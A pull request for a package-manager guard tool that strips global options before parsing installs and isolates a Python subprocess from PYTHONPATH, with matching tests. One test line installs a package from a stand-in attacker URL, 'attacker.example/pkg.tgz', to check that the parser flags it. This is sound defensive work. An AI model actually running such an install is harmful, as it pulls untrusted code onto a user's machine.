### PR TITLE
fix(security): harden package shim routing

### DIFF
--- a/src/codex_plugin_scanner/guard/cli/update_commands.py
+++ b/src/codex_plugin_scanner/guard/cli/update_commands.py
@@ -31,6 +31,7 @@ from ..adapters.opencode_pretool import (
     pretool_plugin_source,
 )
 from ..redaction import redact_sensitive_text
+from ..shims import _trusted_import_root, _trusted_python_flags
 from ..store import GuardStore
 from .dashboard_sync import sync_dashboard_assets as _sync_dashboard_assets
 from .install_commands import apply_managed_install
@@ -922,11 +923,15 @@ def _refresh_package_shims_after_update(
         "guard_home": str(context.guard_home),
     }
     try:
+        refresh_env = dict(os.environ)
+        refresh_env.pop("PYTHONPATH", None)
         result = subprocess.run(
-            [sys.executable, "-c", _PACKAGE_SHIM_REFRESH_SCRIPT],
+            [sys.executable, *_trusted_python_flags(), "-c", _PACKAGE_SHIM_REFRESH_SCRIPT],
             input=json.dumps(refresh_context),
             capture_output=True,
             check=False,
+            cwd=str(_trusted_import_root()),
+            env=refresh_env,
             text=True,
             timeout=_PACKAGE_SHIM_REFRESH_TIMEOUT_SECONDS,
         )

--- a/src/codex_plugin_scanner/guard/protect.py
+++ b/src/codex_plugin_scanner/guard/protect.py
@@ -18,6 +18,7 @@ from .advisory_model import ProtectTargetIdentity, advisory_matches_target, buil
 from .config import GuardConfig
 from .models import GuardReceipt
 from .redaction import redact_text
+from .runtime.package_manager_command import strip_package_manager_global_options
 
 ProtectAction = Literal["allow", "review", "block"]
 SeverityLabel = Literal["low", "medium", "high", "critical"]
@@ -422,27 +423,51 @@ def evaluate_protect_request(
 
 
 def _parse_npm_request(command: list[str]) -> ProtectRequest:
-    specs = _collect_package_specs(command[2:]) if len(command) > 1 and command[1] in {"install", "add", "i"} else ()
+    normalized_command = list(strip_package_manager_global_options(command))
+    specs = (
+        _collect_package_specs(normalized_command[2:])
+        if len(normalized_command) > 1 and normalized_command[1] in {"install", "add", "i"}
+        else ()
+    )
     return _package_manager_request(command, "npm", specs)
 
 
 def _parse_pnpm_request(command: list[str]) -> ProtectRequest:
-    specs = _collect_package_specs(command[2:]) if len(command) > 1 and command[1] in {"add", "install"} else ()
+    normalized_command = list(strip_package_manager_global_options(command))
+    specs = (
+        _collect_package_specs(normalized_command[2:])
+        if len(normalized_command) > 1 and normalized_command[1] in {"add", "install"}
+        else ()
+    )
     return _package_manager_request(command, "pnpm", specs)
 
 
 def _parse_yarn_request(command: list[str]) -> ProtectRequest:
-    specs = _collect_package_specs(command[2:]) if len(command) > 1 and command[1] == "add" else ()
+    normalized_command = tuple(strip_package_manager_global_options(command))
+    working_command = normalized_command
+    if len(normalized_command) >= 4 and normalized_command[1] == "workspace":
+        working_command = (normalized_command[0], *normalized_command[3:])
+    specs = (
+        _collect_package_specs(list(working_command[2:]))
+        if len(working_command) > 1 and working_command[1] == "add"
+        else ()
+    )
     return _package_manager_request(command, "yarn", specs)
 
 
 def _parse_pip_request(command: list[str]) -> ProtectRequest:
-    specs = _collect_package_specs(command[2:]) if len(command) > 1 and command[1] == "install" else ()
+    normalized_command = list(strip_package_manager_global_options(command))
+    specs = (
+        _collect_package_specs(normalized_command[2:])
+        if len(normalized_command) > 1 and normalized_command[1] == "install"
+        else ()
+    )
     return _package_manager_request(command, "pip", specs)
 
 
 def _parse_uv_request(command: list[str]) -> ProtectRequest:
-    specs = _collect_uv_specs(command)
+    normalized_command = list(strip_package_manager_global_options(command))
+    specs = _collect_uv_specs(normalized_command)
     return _package_manager_request(command, "uv", specs)
 
 

--- a/src/codex_plugin_scanner/guard/runtime/package_intent_parser.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_intent_parser.py
@@ -26,6 +26,7 @@ from .package_intent_common import (
     redacted_command,
     version_target,
 )
+from .package_manager_command import strip_package_manager_global_options
 from .secret_file_requests import _SHELL_TOOL_NAMES, _candidate_command_texts, _normalize_tool_name
 
 _CONTROL_TOKENS = {"&&", "||", ";", "|", "|&", "&"}
@@ -120,19 +121,20 @@ def extract_package_intent_request(
 
 
 def _parse_npm_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> PackageIntent | None:
-    if len(tokens) < 2:
+    working_tokens = strip_package_manager_global_options(tokens)
+    if len(working_tokens) < 2:
         return None
-    if tokens[1] in {"install", "i", "add", "update"}:
+    if working_tokens[1] in {"install", "i", "add", "update"}:
         return _build_intent(
             "npm",
             "install",
             tokens,
-            tuple(js_target(spec) for spec in _collect_package_specs(list(tokens[2:]))),
+            tuple(js_target(spec) for spec in _collect_package_specs(list(working_tokens[2:]))),
             workspace=workspace,
             manifest_candidates=("package.json",),
             lockfile_candidates=("package-lock.json",),
         )
-    if tokens[1] == "ci" or (len(tokens) >= 3 and tokens[1:3] == ("audit", "fix")):
+    if working_tokens[1] == "ci" or (len(working_tokens) >= 3 and working_tokens[1:3] == ("audit", "fix")):
         return _build_intent(
             "npm",
             "sync",
@@ -142,35 +144,38 @@ def _parse_npm_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> Pac
             manifest_candidates=("package.json",),
             lockfile_candidates=("package-lock.json",),
         )
-    if tokens[1] in {"exec", "x"}:
-        return _parse_exec_intent(tokens, workspace=workspace)
+    if working_tokens[1] in {"exec", "x"}:
+        return _parse_exec_intent(working_tokens, workspace=workspace)
     return None
 
 
 def _parse_pnpm_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> PackageIntent | None:
-    if len(tokens) < 2:
+    working_tokens = strip_package_manager_global_options(tokens)
+    if len(working_tokens) < 2:
         return None
-    if tokens[1] in {"add", "install", "i"}:
+    if working_tokens[1] in {"add", "install", "i"}:
         return _build_intent(
             "pnpm",
             "install",
             tokens,
-            tuple(js_target(spec) for spec in _collect_specs(tokens[2:], skip_value_options={"--filter", "-F"})),
+            tuple(
+                js_target(spec) for spec in _collect_specs(working_tokens[2:], skip_value_options={"--filter", "-F"})
+            ),
             workspace=workspace,
             manifest_candidates=("package.json", "pnpm-workspace.yaml"),
             lockfile_candidates=("pnpm-lock.yaml",),
         )
-    if tokens[1] == "dlx":
-        return _parse_exec_intent(tokens, workspace=workspace)
+    if working_tokens[1] == "dlx":
+        return _parse_exec_intent(working_tokens, workspace=workspace)
     return None
 
 
 def _parse_yarn_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> PackageIntent | None:
     notes: tuple[str, ...] = ()
-    working_tokens = tokens
-    if len(tokens) >= 4 and tokens[1] == "workspace":
-        notes = (f"workspace:{tokens[2]}",)
-        working_tokens = (tokens[0], *tokens[3:])
+    working_tokens = strip_package_manager_global_options(tokens)
+    if len(working_tokens) >= 4 and working_tokens[1] == "workspace":
+        notes = (f"workspace:{working_tokens[2]}",)
+        working_tokens = (working_tokens[0], *working_tokens[3:])
     if len(working_tokens) < 2:
         return None
     if working_tokens[1] in {"add", "install", "up"}:
@@ -213,15 +218,16 @@ def _parse_exec_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> Pa
 
 
 def _parse_pip_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> PackageIntent | None:
-    if len(tokens) < 2 or tokens[1] != "install":
+    working_tokens = strip_package_manager_global_options(tokens)
+    if len(working_tokens) < 2 or working_tokens[1] != "install":
         return None
     targets: list[PackageIntentTarget] = []
     manifest_paths: list[str] = []
     index = 2
-    while index < len(tokens):
-        token = tokens[index]
-        if token in {"-r", "--requirement", "-c", "--constraint"} and index + 1 < len(tokens):
-            manifest_paths.append(tokens[index + 1])
+    while index < len(working_tokens):
+        token = working_tokens[index]
+        if token in {"-r", "--requirement", "-c", "--constraint"} and index + 1 < len(working_tokens):
+            manifest_paths.append(working_tokens[index + 1])
             index += 2
             continue
         if token.startswith("--requirement=") or token.startswith("--constraint="):
@@ -236,8 +242,8 @@ def _parse_pip_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> Pac
             manifest_paths.append(token[2:])
             index += 1
             continue
-        if token in {"-e", "--editable"} and index + 1 < len(tokens):
-            targets.append(python_target(tokens[index + 1], editable=True))
+        if token in {"-e", "--editable"} and index + 1 < len(working_tokens):
+            targets.append(python_target(working_tokens[index + 1], editable=True))
             index += 2
             continue
         if token in {"--index-url", "--extra-index-url", "--hash"} and index + 1 < len(tokens):
@@ -259,14 +265,15 @@ def _parse_pip_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> Pac
 
 
 def _parse_pipx_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> PackageIntent | None:
-    if len(tokens) < 3 or tokens[1] not in {"install", "run"}:
+    working_tokens = strip_package_manager_global_options(tokens)
+    if len(working_tokens) < 3 or working_tokens[1] not in {"install", "run"}:
         return None
-    target_spec = first_positional(tokens[2:], skip_value_options={"--python"})
+    target_spec = first_positional(working_tokens[2:], skip_value_options={"--python"})
     if target_spec is None:
         return None
     return _build_intent(
         "pipx",
-        "execute" if tokens[1] == "run" else "install",
+        "execute" if working_tokens[1] == "run" else "install",
         tokens,
         (python_target(target_spec),),
         workspace=workspace,
@@ -274,29 +281,30 @@ def _parse_pipx_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> Pa
 
 
 def _parse_uv_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> PackageIntent | None:
-    if len(tokens) < 2:
+    working_tokens = strip_package_manager_global_options(tokens)
+    if len(working_tokens) < 2:
         return None
-    if tokens[1] == "add":
+    if working_tokens[1] == "add":
         return _build_intent(
             "uv",
             "install",
             tokens,
-            tuple(python_target(spec) for spec in _collect_package_specs(list(tokens[2:]))),
+            tuple(python_target(spec) for spec in _collect_package_specs(list(working_tokens[2:]))),
             workspace=workspace,
             manifest_candidates=("pyproject.toml",),
             lockfile_candidates=("uv.lock",),
         )
-    if len(tokens) >= 3 and tokens[1:3] == ("pip", "install"):
+    if len(working_tokens) >= 3 and working_tokens[1:3] == ("pip", "install"):
         return _build_intent(
             "uv",
             "install",
             tokens,
-            tuple(python_target(spec) for spec in _collect_package_specs(list(tokens[3:]))),
+            tuple(python_target(spec) for spec in _collect_package_specs(list(working_tokens[3:]))),
             workspace=workspace,
             manifest_candidates=("pyproject.toml",),
             lockfile_candidates=("uv.lock",),
         )
-    if tokens[1] == "sync":
+    if working_tokens[1] == "sync":
         return _build_intent(
             "uv",
             "sync",
@@ -310,9 +318,10 @@ def _parse_uv_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> Pack
 
 
 def _parse_poetry_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> PackageIntent | None:
-    if len(tokens) < 2:
+    working_tokens = strip_package_manager_global_options(tokens)
+    if len(working_tokens) < 2:
         return None
-    if tokens[1] == "install":
+    if working_tokens[1] == "install":
         return _build_intent(
             "poetry",
             "sync",
@@ -322,13 +331,14 @@ def _parse_poetry_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> 
             manifest_candidates=("pyproject.toml",),
             lockfile_candidates=("poetry.lock",),
         )
-    if tokens[1] != "add":
+    if working_tokens[1] != "add":
         return None
-    group = option_value(tokens, "--group") or option_value(tokens, "-G")
-    extras_value = option_value(tokens, "--extras")
+    group = option_value(working_tokens, "--group") or option_value(working_tokens, "-G")
+    extras_value = option_value(working_tokens, "--extras")
     extras = tuple(item for item in (extras_value or "").split(",") if item)
     targets = tuple(
-        python_target(spec, dependency_group=group, extras=extras) for spec in _collect_package_specs(list(tokens[2:]))
+        python_target(spec, dependency_group=group, extras=extras)
+        for spec in _collect_package_specs(list(working_tokens[2:]))
     )
     return _build_intent(
         "poetry",
@@ -342,9 +352,10 @@ def _parse_poetry_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> 
 
 
 def _parse_pipenv_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> PackageIntent | None:
-    if len(tokens) < 2:
+    working_tokens = strip_package_manager_global_options(tokens)
+    if len(working_tokens) < 2:
         return None
-    if tokens[1] == "sync":
+    if working_tokens[1] == "sync":
         return _build_intent(
             "pipenv",
             "sync",
@@ -354,13 +365,13 @@ def _parse_pipenv_intent(tokens: tuple[str, ...], *, workspace: Path | None) -> 
             manifest_candidates=("Pipfile",),
             lockfile_candidates=("Pipfile.lock",),
         )
-    if tokens[1] != "install":
+    if working_tokens[1] != "install":
         return None
     return _build_intent(
         "pipenv",
         "install",
         tokens,
-        tuple(python_target(spec) for spec in _collect_package_specs(list(tokens[2:]))),
+        tuple(python_target(spec) for spec in _collect_package_specs(list(working_tokens[2:]))),
         workspace=workspace,
         manifest_candidates=("Pipfile",),
         lockfile_candidates=("Pipfile.lock",),

--- a/src/codex_plugin_scanner/guard/runtime/package_manager_command.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_manager_command.py
@@ -126,12 +126,12 @@ def _leading_option_width(
     config: _GlobalOptionConfig,
 ) -> int:
     token = tokens[index]
-    if token in config.value_options:
-        return 2 if index + 1 < len(tokens) else 1
-    if _matches_inline_value_option(token, config.value_options):
-        return 1
     next_index = index + 1
     if next_index < len(tokens) and tokens[next_index] in config.subcommands:
+        return 1
+    if token in config.value_options:
+        return 2 if next_index < len(tokens) else 1
+    if _matches_inline_value_option(token, config.value_options):
         return 1
     next_token = tokens[next_index] if next_index < len(tokens) else None
     if token.startswith("--"):

--- a/src/codex_plugin_scanner/guard/runtime/package_manager_command.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_manager_command.py
@@ -1,0 +1,162 @@
+"""Normalize package-manager commands before install/execute parsing."""
+
+from __future__ import annotations
+
+from collections.abc import Sequence
+from dataclasses import dataclass
+from pathlib import Path
+
+
+@dataclass(frozen=True, slots=True)
+class _GlobalOptionConfig:
+    subcommands: frozenset[str]
+    value_options: frozenset[str] = frozenset()
+
+
+_MANAGER_ALIASES = {
+    "pip3": "pip",
+}
+
+_MANAGER_GLOBAL_OPTIONS: dict[str, _GlobalOptionConfig] = {
+    "npm": _GlobalOptionConfig(
+        subcommands=frozenset({"add", "audit", "ci", "exec", "i", "install", "update", "x"}),
+        value_options=frozenset(
+            {
+                "--cache",
+                "--config",
+                "--prefix",
+                "--registry",
+                "--userconfig",
+                "-C",
+            }
+        ),
+    ),
+    "pnpm": _GlobalOptionConfig(
+        subcommands=frozenset({"add", "dlx", "i", "install"}),
+        value_options=frozenset(
+            {
+                "--dir",
+                "--filter",
+                "--registry",
+                "--store-dir",
+                "--workspace-dir",
+                "-C",
+                "-F",
+            }
+        ),
+    ),
+    "yarn": _GlobalOptionConfig(
+        subcommands=frozenset({"add", "dlx", "install", "up", "workspace"}),
+        value_options=frozenset(
+            {
+                "--cache-folder",
+                "--cwd",
+                "--modules-folder",
+                "--registry",
+            }
+        ),
+    ),
+    "pip": _GlobalOptionConfig(
+        subcommands=frozenset({"install"}),
+        value_options=frozenset(
+            {
+                "--cache-dir",
+                "--cert",
+                "--client-cert",
+                "--extra-index-url",
+                "--find-links",
+                "--index-url",
+                "--proxy",
+                "--python",
+                "--retries",
+                "--timeout",
+                "--trusted-host",
+                "-f",
+                "-i",
+            }
+        ),
+    ),
+    "pipx": _GlobalOptionConfig(
+        subcommands=frozenset({"install", "run"}),
+        value_options=frozenset({"--index-url", "--pip-args", "--python"}),
+    ),
+    "uv": _GlobalOptionConfig(
+        subcommands=frozenset({"add", "pip", "sync"}),
+        value_options=frozenset({"--cache-dir", "--directory", "--index", "--python", "--project"}),
+    ),
+    "poetry": _GlobalOptionConfig(
+        subcommands=frozenset({"add", "install"}),
+        value_options=frozenset({"--directory", "-C"}),
+    ),
+    "pipenv": _GlobalOptionConfig(
+        subcommands=frozenset({"install", "sync"}),
+        value_options=frozenset({"--python"}),
+    ),
+}
+
+
+def strip_package_manager_global_options(tokens: Sequence[str]) -> tuple[str, ...]:
+    normalized_tokens = tuple(str(token) for token in tokens)
+    if len(normalized_tokens) < 2:
+        return normalized_tokens
+    config = _MANAGER_GLOBAL_OPTIONS.get(_manager_key(normalized_tokens[0]))
+    if config is None:
+        return normalized_tokens
+    index = 1
+    while index < len(normalized_tokens):
+        token = normalized_tokens[index]
+        if token in config.subcommands:
+            return (normalized_tokens[0], *normalized_tokens[index:])
+        if token == "--":
+            break
+        if not token.startswith("-"):
+            return (normalized_tokens[0], *normalized_tokens[index:])
+        index += _leading_option_width(normalized_tokens, index, config)
+    return normalized_tokens
+
+
+def _manager_key(command_name: str) -> str:
+    normalized = Path(command_name).name.lower()
+    return _MANAGER_ALIASES.get(normalized, normalized)
+
+
+def _leading_option_width(
+    tokens: tuple[str, ...],
+    index: int,
+    config: _GlobalOptionConfig,
+) -> int:
+    token = tokens[index]
+    if token in config.value_options:
+        return 2 if index + 1 < len(tokens) else 1
+    if _matches_inline_value_option(token, config.value_options):
+        return 1
+    next_index = index + 1
+    if next_index < len(tokens) and tokens[next_index] in config.subcommands:
+        return 1
+    next_token = tokens[next_index] if next_index < len(tokens) else None
+    if token.startswith("--"):
+        if (
+            "=" not in token
+            and next_token is not None
+            and not next_token.startswith("-")
+            and next_token not in config.subcommands
+        ):
+            return 2
+        return 1
+    if (
+        len(token) == 2
+        and next_token is not None
+        and not next_token.startswith("-")
+        and next_token not in config.subcommands
+    ):
+        return 2
+    return 1
+
+
+def _matches_inline_value_option(token: str, value_options: frozenset[str]) -> bool:
+    for option in value_options:
+        if option.startswith("--") and token.startswith(f"{option}="):
+            return True
+        if option.startswith("-") and not option.startswith("--") and token.startswith(option) and token != option:
+            return True
+    return False

--- a/tests/test_guard_package_intent.py
+++ b/tests/test_guard_package_intent.py
@@ -234,6 +234,32 @@ def test_parse_package_intent_skips_wrapper_flags_before_manager_detection() -> 
     assert pip_intent.targets[0].package_name == "flask"
 
 
+def test_parse_package_intent_supports_manager_global_options_before_guarded_subcommands(tmp_path: Path) -> None:
+    _write_text(tmp_path / "package.json", '{"name":"demo"}\n')
+
+    npm_intent = parse_package_intent(
+        "npm --prefix . install https://attacker.example/pkg.tgz",
+        workspace=tmp_path,
+    )
+    pnpm_intent = parse_package_intent("pnpm --dir . add minimist@1.2.8", workspace=tmp_path)
+    yarn_intent = parse_package_intent("yarn --cwd . workspace web add react@18.3.0", workspace=tmp_path)
+    pip_intent = parse_package_intent("pip --isolated install requests==2.32.3", workspace=tmp_path)
+
+    assert npm_intent is not None
+    assert npm_intent.package_manager == "npm"
+    assert npm_intent.targets[0].source_url == "https://attacker.example/pkg.tgz"
+    assert pnpm_intent is not None
+    assert pnpm_intent.package_manager == "pnpm"
+    assert pnpm_intent.targets[0].package_name == "minimist"
+    assert yarn_intent is not None
+    assert yarn_intent.package_manager == "yarn"
+    assert yarn_intent.notes == ("workspace:web",)
+    assert yarn_intent.targets[0].package_name == "react"
+    assert pip_intent is not None
+    assert pip_intent.package_manager == "pip"
+    assert pip_intent.targets[0].package_name == "requests"
+
+
 def test_parse_package_intent_poetry_and_pipenv_use_project_lockfile_context(tmp_path: Path) -> None:
     _write_text(tmp_path / "pyproject.toml", "[tool.poetry]\nname = 'demo'\n")
     _write_text(tmp_path / "poetry.lock", "[[package]]\nname='requests'\nversion='2.32.0'\n")

--- a/tests/test_guard_package_intent.py
+++ b/tests/test_guard_package_intent.py
@@ -260,6 +260,14 @@ def test_parse_package_intent_supports_manager_global_options_before_guarded_sub
     assert pip_intent.targets[0].package_name == "requests"
 
 
+def test_parse_package_intent_keeps_install_subcommand_when_global_option_value_is_missing(tmp_path: Path) -> None:
+    intent = parse_package_intent("pip --index-url install requests==2.32.3", workspace=tmp_path)
+
+    assert intent is not None
+    assert intent.package_manager == "pip"
+    assert intent.targets[0].package_name == "requests"
+
+
 def test_parse_package_intent_poetry_and_pipenv_use_project_lockfile_context(tmp_path: Path) -> None:
     _write_text(tmp_path / "pyproject.toml", "[tool.poetry]\nname = 'demo'\n")
     _write_text(tmp_path / "poetry.lock", "[[package]]\nname='requests'\nversion='2.32.0'\n")

--- a/tests/test_guard_package_shims.py
+++ b/tests/test_guard_package_shims.py
@@ -456,12 +456,17 @@ def test_package_manager_shim_runs_allowed_command_once_when_shim_dir_is_on_path
     [
         ("bun", ("add", "minimist@1.2.9"), True),
         ("pip", ("install", "requests==2.32.3"), True),
+        ("pip", ("--isolated", "install", "requests==2.32.3"), True),
         ("npm", ("install", "minimist@1.2.9"), True),
+        ("npm", ("--registry=https://registry.example.com", "install", "minimist@1.2.9"), True),
         ("npm", ("run", "dev"), False),
         ("pnpm", ("add", "minimist@1.2.9"), True),
+        ("pnpm", ("--dir", ".", "add", "minimist@1.2.9"), True),
         ("pnpm", ("install",), True),
+        ("pnpm", ("--dir", ".", "run", "dev"), False),
         ("pnpm", ("run", "dev"), False),
         ("yarn", ("add", "minimist@1.2.9"), True),
+        ("yarn", ("--cwd", ".", "add", "minimist@1.2.9"), True),
     ],
 )
 def test_package_shim_command_requires_guard_only_for_supply_chain_actions(
@@ -524,10 +529,20 @@ def test_package_manager_shim_bypasses_guard_for_pnpm_run_commands(tmp_path: Pat
 
 _BLOCKING_SHIM_CASES = (
     ("npm", ("install", "minimist@1.2.8"), "npm", "minimist", "1.2.8"),
+    (
+        "npm",
+        ("--registry=https://registry.example.com", "install", "minimist@1.2.8"),
+        "npm",
+        "minimist",
+        "1.2.8",
+    ),
     ("pnpm", ("add", "minimist@1.2.8"), "npm", "minimist", "1.2.8"),
+    ("pnpm", ("--dir", ".", "add", "minimist@1.2.8"), "npm", "minimist", "1.2.8"),
     ("yarn", ("add", "minimist@1.2.8"), "npm", "minimist", "1.2.8"),
+    ("yarn", ("--cwd", ".", "add", "minimist@1.2.8"), "npm", "minimist", "1.2.8"),
     ("bun", ("add", "minimist@1.2.8"), "npm", "minimist", "1.2.8"),
     ("pip", ("install", "requests==2.32.0"), "pypi", "requests", "2.32.0"),
+    ("pip", ("--isolated", "install", "requests==2.32.0"), "pypi", "requests", "2.32.0"),
     ("uv", ("add", "requests==2.32.0"), "pypi", "requests", "2.32.0"),
     ("poetry", ("add", "requests@2.32.0"), "pypi", "requests", "2.32.0"),
     ("pipenv", ("install", "requests==2.32.0"), "pypi", "requests", "2.32.0"),

--- a/tests/test_guard_phase03_local_install.py
+++ b/tests/test_guard_phase03_local_install.py
@@ -532,13 +532,22 @@ def test_refresh_package_shims_after_update_uses_fresh_python_process(
     manifest_path.write_text(json.dumps({"installed_managers": ["pnpm"]}), encoding="utf-8")
 
     def fake_run(command: list[str], **kwargs: object) -> subprocess.CompletedProcess[str]:
-        assert command == [update_commands.sys.executable, "-c", update_commands._PACKAGE_SHIM_REFRESH_SCRIPT]
+        assert command == [
+            update_commands.sys.executable,
+            *update_commands._trusted_python_flags(),
+            "-c",
+            update_commands._PACKAGE_SHIM_REFRESH_SCRIPT,
+        ]
         refresh_context = json.loads(str(kwargs.get("input")))
         assert refresh_context == {
             "home_dir": str(context.home_dir),
             "workspace_dir": str(context.workspace_dir),
             "guard_home": str(context.guard_home),
         }
+        assert kwargs.get("cwd") == str(update_commands._trusted_import_root())
+        refresh_env = kwargs.get("env")
+        assert isinstance(refresh_env, dict)
+        assert "PYTHONPATH" not in refresh_env
         assert kwargs.get("timeout") == update_commands._PACKAGE_SHIM_REFRESH_TIMEOUT_SECONDS
         refresh_payload = {
             "before": {"installed_managers": ["pnpm"]},

--- a/tests/test_guard_protect_package_spec_parsing.py
+++ b/tests/test_guard_protect_package_spec_parsing.py
@@ -55,6 +55,22 @@ def test_parse_protect_command_records_npm_registry_override_before_package() ->
     assert target.version == "1.2.3"
 
 
+def test_parse_protect_command_records_npm_global_registry_override_before_install_subcommand() -> None:
+    request = protect.parse_protect_command(
+        [
+            "npm",
+            "--registry=https://registry.example.com",
+            "install",
+            "@scope/guard-safe@1.2.3",
+        ],
+    )
+
+    target = request.targets[0]
+    assert target.raw_spec == "@scope/guard-safe@1.2.3"
+    assert target.package_name == "@scope/guard-safe"
+    assert target.version == "1.2.3"
+
+
 def test_parse_protect_command_records_pip_pep508_direct_url_spec() -> None:
     request = protect.parse_protect_command(
         ["pip", "install", "requests @ https://files.example.com/requests-2.32.3.tar.gz"],
@@ -73,6 +89,24 @@ def test_parse_protect_command_records_pip_registry_override_before_package() ->
             "install",
             "--index-url",
             "https://pypi.example/simple",
+            "requests==2.32.3",
+        ],
+    )
+
+    target = request.targets[0]
+    assert target.raw_spec == "requests==2.32.3"
+    assert target.package_name == "requests"
+    assert target.version == "2.32.3"
+
+
+def test_parse_protect_command_records_pip_global_flags_before_install_subcommand() -> None:
+    request = protect.parse_protect_command(
+        [
+            "pip",
+            "--isolated",
+            "--index-url",
+            "https://pypi.example/simple",
+            "install",
             "requests==2.32.3",
         ],
     )

--- a/tests/test_guard_protect_package_spec_parsing.py
+++ b/tests/test_guard_protect_package_spec_parsing.py
@@ -115,3 +115,19 @@ def test_parse_protect_command_records_pip_global_flags_before_install_subcomman
     assert target.raw_spec == "requests==2.32.3"
     assert target.package_name == "requests"
     assert target.version == "2.32.3"
+
+
+def test_parse_protect_command_keeps_install_subcommand_when_global_option_value_is_missing() -> None:
+    request = protect.parse_protect_command(
+        [
+            "pip",
+            "--index-url",
+            "install",
+            "requests==2.32.3",
+        ],
+    )
+
+    target = request.targets[0]
+    assert target.raw_spec == "requests==2.32.3"
+    assert target.package_name == "requests"
+    assert target.version == "2.32.3"

--- a/tests/test_shim_probe_security.py
+++ b/tests/test_shim_probe_security.py
@@ -152,3 +152,49 @@ def test_installed_shim_honors_probe_env_without_real_execution(
     assert not marker_path.exists()
     payload = parse_protect_json_stdout(result.stdout)
     assert payload.get("dry_run") is True
+
+
+@pytest.mark.parametrize(
+    ("manager", "argv"),
+    [
+        ("npm", ("--registry=https://registry.example.com", "install", "lodash@4.17.21")),
+        ("pnpm", ("--dir", ".", "add", "lodash@4.17.21")),
+        ("yarn", ("--cwd", ".", "add", "lodash@4.17.21")),
+        ("pip", ("--isolated", "install", "requests==2.32.3")),
+    ],
+)
+def test_installed_shim_probe_guards_global_option_package_commands(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+    manager: str,
+    argv: tuple[str, ...],
+) -> None:
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir(parents=True)
+    context = _harness_context(tmp_path, workspace_dir=workspace_dir)
+    install_package_shims(context, managers=(manager,))
+    shim_dir = context.guard_home / "package-shims" / "bin"
+    fake_bin = tmp_path / "fake-bin"
+    fake_bin.mkdir(parents=True)
+    marker_path = tmp_path / f"{manager}-direct-marker.json"
+    write_fake_manager_script(
+        fake_bin=fake_bin,
+        manager=manager,
+        marker_path=marker_path,
+        exit_code=0,
+    )
+    monkeypatch.setenv("PATH", os.pathsep.join([str(shim_dir), str(fake_bin)]))
+
+    result = subprocess.run(
+        [str(shim_dir / manager), *argv],
+        capture_output=True,
+        text=True,
+        check=False,
+        cwd=workspace_dir,
+        env={**os.environ, "HOL_GUARD_SHIM_PROBE": "1"},
+    )
+
+    assert result.returncode == 0
+    assert not marker_path.exists()
+    payload = parse_protect_json_stdout(result.stdout)
+    assert payload.get("dry_run") is True


### PR DESCRIPTION
## Summary
- normalize package-manager global options before shim, protect, and package-intent parsing so option-prefixed installs still route through Guard
- run package-shim refresh after update with isolated Python flags, a trusted import directory, and a sanitized import environment

## Testing
- `pytest tests/test_guard_package_intent.py tests/test_guard_package_shims.py tests/test_guard_protect_package_spec_parsing.py tests/test_guard_phase03_local_install.py tests/test_shim_probe_security.py -k 'supports_manager_global_options_before_guarded_subcommands or package_shim_command_requires_guard_only_for_supply_chain_actions or parse_protect_command_records_npm_global_registry_override_before_install_subcommand or parse_protect_command_records_pip_global_flags_before_install_subcommand or refresh_package_shims_after_update_uses_fresh_python_process or installed_shim_probe_guards_global_option_package_commands'`
- `python3 -m ruff check src/codex_plugin_scanner/guard/runtime/package_manager_command.py src/codex_plugin_scanner/guard/runtime/package_intent_parser.py src/codex_plugin_scanner/guard/protect.py src/codex_plugin_scanner/guard/cli/update_commands.py tests/test_guard_package_intent.py tests/test_guard_package_shims.py tests/test_guard_phase03_local_install.py tests/test_guard_protect_package_spec_parsing.py tests/test_shim_probe_security.py`
